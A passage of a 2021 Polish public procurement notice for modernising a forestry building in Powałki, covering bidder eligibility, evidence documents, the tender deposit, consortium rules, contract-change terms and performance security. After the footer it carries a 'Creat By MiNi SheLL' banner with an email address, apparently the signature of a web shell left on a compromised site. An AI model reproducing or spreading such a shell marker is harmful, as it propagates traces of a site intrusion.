<p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej. Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że :<br/>• posiada środki finansowe lub zdolność kredytową nie mniejszą niż:<br/>I) dla Pakietu I<br/>270 000,00 zł<br/>II) dla Pakietu II<br/>140 000,00 zł<br/>• jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności na kwotę nie mniejszą niż:<br/>I) dla Pakietu I<br/>• 150 000,00 zł<br/>II) dla Pakietu II<br/>• 100 000,00 zł<br/>W przypadku ubiegania się przez jednego wykonawcę na oba pakiety, warunek posiadania polisy od odpowiedzialności cywilnej (OC) musi być spełniony łącznie na oba pakiety.<br/>2) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia, w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie):<br/>I) dla Pakietu I<br/>zrealizował lub realizuje co najmniej 1 robotę budowlaną polegającą na wykonaniu budowy lub remontu budynku o łącznej wartości wykazanych robót na kwotę nie mniejszą niż 200 000,00 zł<br/>brutto<br/>II) dla Pakietu II<br/>zrealizował lub realizuje co najmniej 1 robotę budowlaną polegającą na wykonaniu budowy lub remontu budynku o łącznej wartości wykazanych robót na kwotę nie mniejszą niż 100 000,00 zł brutto<br/>b) Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>I) dla Pakietu I i II łącznie:<br/>a) co najmniej jednym kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, określone przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. 2020r. poz. 1333) lub odpowiadające im uprawnienia budowlane wydane w oparciu o wcześniej obowiązujące przepisy prawa, który pełnił funkcję kierownika budowy przy budowie, przebudowie lub remoncie co najmniej jednego budynku mieszkalnego i gospodarczego. Dopuszcza się osoby posiadające uprawnienia wydane za granicą zgodnie z przepisami o uznawaniu kwalifikacji zawodowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1<br/>pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>karnego, (c) art. 109 ust. 1 pkt 2 lit a) PZP, (d) art. 109 ust. 1 pkt 2 lit b) PZP, odnośnie do skazania za<br/>wykroczenie, za które wymierzono karę aresztu, (e) art. 109 ust. 1 pkt 3 PZP, odnośnie do skazania za<br/>przestępstwo lub wykroczenie, za które wymierzona karę aresztu - wystawioną nie wcześniej niż 6<br/>miesięcy przed jej złożeniem,<br/>h) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków i opłat wraz z<br/>zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności,<br/>i) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt<br/>1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>j) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>k) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące<br/>wstępne potwierdzenie spełniania warunków udziału w postępowaniu oraz brak podstaw wykluczenia<br/>wg wzoru stanowiącego Załącznik nr 4 do SWZ,<br/>a nadto odpowiednie pełnomocnictwa (jeżeli umocowanie osoby/osób podpisujących ofertę nie wynika z danych ujawnionych we właściwym rejestrze oraz zobowiązania podmiotów trzecich, na których<br/>zasobach Wykonawca polega na zasadzie art. 118 PZP przy wykazywaniu spełnianiu warunków<br/>udziału w postępowaniu.<br/>b) Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz.U. 2021 poz. 275 z późn.zm) z innym wykonawcą , który złożył odrębną ofertę lub ofertę<br/>częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie<br/>art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi<br/>załącznik nr 5 do SWZ),<br/>c) wykaz robót budowlanych porównywalnych z robotami budowlanymi stanowiącymi przedmiot<br/>zamówienia, w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie<br/>ostatnich 5 lat od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych<br/>robót budowlanych), dat wykonania, miejsc i nazw podmiotów, na rzecz których roboty budowlane<br/>zostały wykonane (wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 7 do SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami informacje, o których mowa wyżej dotyczą robót budowlanych<br/>faktycznie przez niego wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych -<br/>również faktycznie przez niego wykonywanych.<br/>d) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku<br/>udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały<br/>wykonane lub są wykonywane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>e) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez Zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w pkt 9.1. lit e) SWZ, Wykonawca składa inne<br/>podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnienie opisanego przez<br/>Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>f) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, posiadanych uprawnień i doświadczenia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej dla Pakietów:<br/>dla Pakietu I w wysokości 4000,00 zł dla Pakietu II w wysokości 2000,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r. poz. 299).<br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BGŻ BNP Paribas O/Tuchola nr rachunku: 05 2030 0045 1110 0000<br/>0076 2920 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Modernizacja<br/>budynku mieszkalnego i gospodarczego w leśnictwie Powałki- Pakiet<br/>nr___________________.” Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w<br/>podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej<br/>lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno<br/>wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w<br/>terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty<br/>wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-<br/>4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego<br/>wystawienia. Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres<br/>związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób<br/>nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP<br/>zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>11.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnienie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o zamówienie;<br/>4) dokumenty, o których mowa w pkt 9.1. lit. g – j obowiązany będzie złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana terminu realizacji:wystąpienie przez min.3dni niekorzystnych warunków<br/>atm.uniemożliwiających prowadzenieRB,przeprowadzanie prób i sprawdzeń,dokonywanie<br/>odbiorów itp,w szczeg.ekstremalne temp.powietrza,wichury,gwałtowne opady deszczu<br/>powodujące podtopienia,działania sił natury,które zostały uznane na stan klęski żywiołowejprzedłuż.<br/>terminu realizacji nastąpi maks.o tyle dni,ile trwały warunki atm.uniemożliwiające<br/>prowadzenie robót,o ile fakt ich wystąpienia zostanie udokumentowany w dzienniku robót i<br/>potwierdzony przezInspektora nadzoru;konieczności wykonania robót,których niewykonanie w<br/>sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu<br/>umowy,wystąpienia innych przyczyn zewn.niezależnych odWykonawcy iZamawiającego<br/>skutkujących niemożliwością prowadzenia prac(wystąpienie niezinwentaryzowanych obiektów<br/>bud.,brak dojazdu na teren budowy,znaleziska archeologiczne,pożary,strajki,protesty,blokady<br/>dróg,epidemie i pandemie)-przedłużenie terminu realizacji umowy nastąpi maks.o tyle dni,ile<br/>trwało wstrzymanie robót;wstrzymania robót przez właściwe organy z przyczyn niezależnych<br/>odWykonawcy–przedłużenie terminu realizacji nastąpi maks.o tyle dni ile trwało wstrzymanie<br/>robót;konieczności wykonania robót dodatkowych nieobjętych zamówieniem podst.lub robót<br/>zamiennych,gdy czas ich realizacji lub zakres uniemożliwiają dotrzymanie terminu zakończenia<br/>robót-przedłużenie terminu realizacji nastąpi maks.o tyle dni ile trwało wykonanie robót<br/>nieobjętych zamówieniem podst.Zmiana zakresu robót:konieczność wykonania robót<br/>zamiennych w stos.do przewidzianych dokumentacją projektową,gdy wykonanie tych robót<br/>będzie niezbędne do prawidłowego,tj.zgodnego z zasadami wiedzy techn.i obowiązującymi na<br/>dzień odbioru robót przepisami,wykonania przedmiotu umowy i uzyskania założonego efektu<br/>użytkowego;konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań<br/>techn./technolog.niż wskazane w dokumentacji projektowej,gdy zastosowanie przewidzianych<br/>rozwiązań grozi niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;wystąpienia<br/>odmiennych warunków terenowych,w szczeg.istnienia podziemnych urządzeń,instalacji itp.gdy<br/>wykonanie danych robót będzie zbędne/konieczne do prawidłowego tj.zgodnego z zasadami<br/>wiedzy techn.i obowiązującymi na dzień odbioru robót przepisami,wykonania przedmiotu<br/>umowy,redukcji części zadań do wykonania lub zaniechania części robót stanowiących przedmiot umowy z uwagi na wykonanie robót zamiennych,przy czym wartość takiej zmiany nie<br/>przekroczy20%wynagrodz.pierwotnie określonego w umowie-WynagrodzenieWykonawcy<br/>zostanie odpowiednio zmniejszone o wartość niezrealizowanych lub zaniechanych robót.Zmiana<br/>zakresu robót wymaga uzyskania akceptacji osób sprawujących nadzór autorski i inwestorski,a<br/>także zatwierdzenia przezZamawiającego.Zmiana osób realizujących przedmiot umowy,w<br/>szczeg.kierownika budowy:na żądanieZamawiającego w przypadku nienależytego wykonania<br/>powierzonych prac;na wniosekWykonawcy w przypadku:śmierci,choroby lub innego zdarzenia<br/>losowego,nienależytego wykonywania powierzonych prac,innych obiektywnych okoliczności<br/>niezależnych odWykonawcy(np.rezygnacji).W przypadku zmiany kierownika<br/>budowy,Wykonawca musi przedstawić kandydaturę innej osoby spełniającej warunki zawarte<br/>wSWZ i uzyskać zgodęZamawiającego.Zmiana osoby pełniącej nadzór z<br/>ramieniaZamawiającego:w przypadku:śmierci,choroby,innego zdarzenia<br/>losowego,nienależytego wykonywania powierzonych prac,innych obiektywnych okoliczności<br/>niezależnych odZamawiającego(np.rezygnacji).Zmiana podwykonawców:na<br/>żądanieZamawiającego w przypadku nienależytego wykonania powierzonych prac;na<br/>wniosekWykonawcy w przypadku:nienależytego wykonywania powierzonych prac,innych<br/>obiektywnych okoliczności niezależnych odWykonawcy(np.rezygnacji).Dopuszcza się udział<br/>podwykonawców na wniosekWykonawcy,w przypadku,gdy pierwotnieWykonawca nie zakładał<br/>ich udziału w realizacji zamówienia.Zmiana stawki podatku VAT będzie możliwa,gdy nastąpi<br/>zmiana przepisów prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez<br/>wykonawcę, którego oferta została uznana za najkorzystniejszą w danym<br/>Pakiecie.Zabezpieczenie należytego wykonania umowy wynosić będzie 5 % ceny łącznej<br/>wynikającej na daną część zamówienia(dany Pakiet).Zabezpieczenie może być wnoszone<br/>według wyboru Wykonawcy w jednej lub w kilku następujących<br/>formach:1)pieniądzu;2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy<br/>oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem<br/>pieniężnym;3)gwarancjach bankowych;4)gwarancjach ubezpieczeniowych;5)poręczeniach<br/>udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz.U. 2020r. poz.<br/>299).W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na<br/>zaliczenie kwoty wadium na poczet zabezpieczenia.Zabezpieczenie wnoszone w pieniądzu<br/>wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.Jeżeli<br/>zabezpieczenie wniesiono w pieniądzu,Zamawiający przechowuje je na oprocentowanym<br/>rachunku bankowym.Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami<br/>wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,<br/>pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy<br/>na rachunek bankowy Wykonawcy.Zabezpieczenie należytego wykonania umowy, we<br/>wszystkich formach przewidzianych w pkt 20.3., powinno zabezpieczać roszczenia wynikające z niewykonania bądź nienależytego wykonania umowy w taki sam sposób, co oznacza, iż<br/>zabezpieczenie wniesione w formie innej niż pieniądz nie może zabezpieczać roszczeń<br/>Zamawiającego w sposób mniej korzystny, niż jakby miało to miejsce w przypadku wniesienia<br/>zabezpieczenia w pieniądzu. Zabezpieczenie należytego wykonania umowy w formie<br/>gwarancji/poręczenia powinno być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne<br/>żądanie Zamawiającego. Zamawiający nie dopuszcza możliwości uzależnienia wypłaty kwot z<br/>gwarancji/poręczenia od przedłożenia jakichkolwiek dodatkowych dokumentów, bądź spełnienia<br/>jakichkolwiek warunków, poza oświadczeniem Zamawiającego, iż żądana kwota jest należna z<br/>tytułu niewykonania bądź nienależytego wykonania umowy.Zamawiający dokona zwrotu<br/>zabezpieczenia należytego wykonania umowy w następujący sposób:•70 % wartości<br/>zabezpieczenia zostanie zwrócone w terminie 30 dni od dnia wykonania zamówienia i uznania<br/>przez Zamawiającego za należycie wykonane,•30 % wartości zabezpieczenia zostanie<br/>zatrzymane przez zamawiającego na zabezpieczenie roszczeń z tytułu rękojmi za wady (liczonej<br/>od daty odbioru robot), kwota ta zostanie zwrócona w terminie do 15 dni po upływie okresu<br/>rękojmi.W przypadku wniesienia zabezpieczenia w formie innej niż pieniądzu należy wnieść dwa<br/>dokumenty z podziałem na(70% i 30%) 5 % zabezpieczenia należnego wykonania umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com